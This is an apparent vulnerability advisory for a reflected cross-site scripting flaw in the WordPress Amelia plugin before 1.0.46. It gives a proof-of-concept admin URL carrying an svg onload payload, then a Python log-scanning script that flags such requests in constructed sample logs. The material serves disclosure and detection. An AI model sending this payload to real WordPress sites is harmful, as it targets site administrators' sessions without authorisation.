wpexploit | Ran Crane | WPEX-ID:FD8C720A-A94A-438F-B686-3A734E3C24E4
History: Feb 23, 2022 - 12:00 a.m.

Amelia < 1.0.46 - Reflected Cross-Site Scripting


EPSS: 0.001 (Low), percentile 40.4%

The plugin does not sanitize and escape the code parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue.

https://example.com/wp-admin/admin.php?page=wpamelia-dashboard&code=</script><svg/onload=alert(/XSS/)>
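
A log check for the request shape shown above, as an added example that is not part of the original advisory or the plugin's own code: it flags requests to page=wpamelia-dashboard whose code value decodes to markup characters, including double-encoded values. The log lines are constructed samples, and treating <, >, and quotes as never legitimate in code is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Feb/2022:10:00:01 +0000] "GET /wp-admin/admin.php?page=wpamelia-dashboard HTTP/1.1" 200 5120',
    '203.0.113.9 - - [23/Feb/2022:10:02:17 +0000] "GET /wp-admin/admin.php?page=wpamelia-dashboard&code=%3C/script%3E%3Csvg/onload=alert(/XSS/)%3E HTTP/1.1" 200 5301',
    '203.0.113.9 - - [23/Feb/2022:10:02:40 +0000] "GET /wp-admin/admin.php?page=wpamelia-dashboard&code=%253Csvg%253E HTTP/1.1" 200 5290',
    '198.51.100.7 - - [23/Feb/2022:10:05:00 +0000] "GET /wp-admin/admin.php?page=wpamelia-dashboard&code=4%2F0AX4XfWh-abc_DEF HTTP/1.1" 200 5133',
    '198.51.100.7 - - [23/Feb/2022:10:06:00 +0000] "GET /wp-admin/admin.php?page=other-plugin&code=%3Cb%3E HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate code value never contains these characters.
MARKUP_CHARS = set('<>"\'')


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(lines):
    """Return (client_ip, decoded_code) for dashboard requests carrying markup."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if "wpamelia-dashboard" not in query.get("page", []):
            continue  # only the admin page named in the advisory
        for raw in query.get("code", []):
            value = fully_decode(raw)  # parse_qs already decoded one layer
            if MARKUP_CHARS & set(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} sent code={value!r}")
```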
